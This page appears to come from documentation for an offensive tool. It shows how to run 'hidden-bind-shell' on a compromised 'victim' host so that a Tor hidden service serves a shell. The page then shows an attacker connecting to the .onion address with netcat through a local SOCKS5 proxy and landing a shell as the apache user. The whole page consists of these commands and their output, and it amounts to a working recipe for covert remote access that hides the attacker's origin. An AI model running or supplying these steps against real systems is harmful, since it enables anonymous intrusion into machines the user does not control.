Multi-shell access with hidden-bind-shell

In order to get a bind shell served by Victim1 on the Tor network, we will use hidden-bind-shell as follows. As shown in the following illustration, the victim publish a Hidden Server so that any connection will serve a shell.

Hidden Service as Bind Shell

1. Hidden Service for bind shell

In order to get a bind shell served by Victim1, we will use hidden-bind-shell. We need to specify the hidden service port with -hiddensrvport parameter and the datadir with -data-dir parameter.

[victim1]$ ./hidden-bind-shell -data-dir /tmp/datadir/ -hiddensrvport 1234
...
Bind shell is listening on hgnzi6j3rqog6yew.onion:1234

2. Connect to the bind shell

Now that the Hidden Service is listening, the attacker will attempt to gain a shell:

Note that the Tor instance proxy must be running so that the traffix is rooted to Tor network.

[attacker]$ alias nctor='nc --proxy 127.0.0.1:9050 --proxy-type socks5'
[attacker]$ nctor -v hgnzi6j3rqog6yew.onion 1234
...
id
uid=48(apache) gid=48(apache) groups=48(apache)

Last updated

Was this helpful?